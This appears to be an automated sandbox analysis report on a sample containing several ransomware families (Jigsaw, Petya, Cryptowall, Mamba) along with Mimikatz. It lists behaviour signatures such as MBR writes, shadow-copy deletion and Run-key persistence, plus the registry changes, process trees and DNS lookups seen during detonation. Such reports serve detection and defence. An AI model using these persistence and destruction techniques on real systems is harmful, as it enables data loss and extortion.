Malware Analysis Report

2024-09-22 13:07

Sample ID 240630-bcjr6svbkk
Target bc41543926dda3762ae39e35aba7a813_JaffaCakes118
SHA256 f255227fd45316c4681085f39e6da2f509af851f8cc2d2a84ea99c06b935ffe6
Tags
bootkit persistence jigsaw ransomware spyware stealer execution upx mimikatz cerber discovery evasion privilege_escalation locky defense_evasion impact
score
10/10

Analysis Overview

score
10/10

SHA256

f255227fd45316c4681085f39e6da2f509af851f8cc2d2a84ea99c06b935ffe6

Threat Level: Known bad

The file bc41543926dda3762ae39e35aba7a813_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

bootkit persistence jigsaw ransomware spyware stealer execution upx mimikatz cerber discovery evasion privilege_escalation locky defense_evasion impact

Locky

Mimikatz

Jigsaw Ransomware

Suspicious use of NtCreateProcessExOtherParentProcess

Cerber

Renames multiple (3792) files with added filename extension

mimikatz is an open source tool to dump credentials on Windows

Renames multiple (2015) files with added filename extension

Deletes shadow copies

Contacts a large (1107) amount of remote hosts

Modifies Windows Firewall

Blocklisted process makes network request

Contacts a large (1095) amount of remote hosts

Boot or Logon Autostart Execution: Port Monitors

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

UPX packed file

Deletes itself

Drops desktop.ini file(s)

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Looks up external IP address via web service

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Command and Scripting Interpreter: JavaScript

Program crash

Unsigned PE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Checks processor information in registry

Opens file in notepad (likely ransom note)

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Kills process with taskkill

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

Uses Volume Shadow Copy service COM API

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious use of UnmapMainImage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-30 01:00

Signatures

UPX packed file

upx

Unsigned PE


Analysis: behavioral10

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1679s

Max time network

1694s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Network

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

0s

Max time network

1s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Network

N/A

Files

memory/1728-1-0x0000000000400000-0x000000000043F000-memory.dmp

memory/1728-0-0x000000000041A000-0x0000000000427000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1385s

Max time network

1178s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1628 -ip 1628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 476

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 105.246.116.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1354s

Max time network

1178s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Renames multiple (3792) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Port Monitors

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Ports C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\IPP C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon\Ports C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint\OfflinePorts C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports C:\Windows\System32\spoolsv.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe N/A

Drops file in Program Files directory


Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\System32\spoolsv.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Send To OneNote 2016 = "winspool,nul:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Send To OneNote 2016 = "winspool,nul:" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Send To OneNote 2016 = "winspool,nul:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Send To OneNote 2016 = "winspool,nul:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" C:\Windows\System32\spoolsv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices C:\Windows\System32\spoolsv.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4028 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
PID 3548 wrote to memory of 468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 4016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3548 wrote to memory of 1940 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\ShowConnect.mht

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x120,0x124,0xfc,0x128,0x7ffb7ffc46f8,0x7ffb7ffc4708,0x7ffb7ffc4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\b4b2597ca91442b88eea24723abaa22f /t 3068 /p 3428

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb91f9ab58,0x7ffb91f9ab68,0x7ffb91f9ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2272 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4420 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4100 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4688 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3924 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

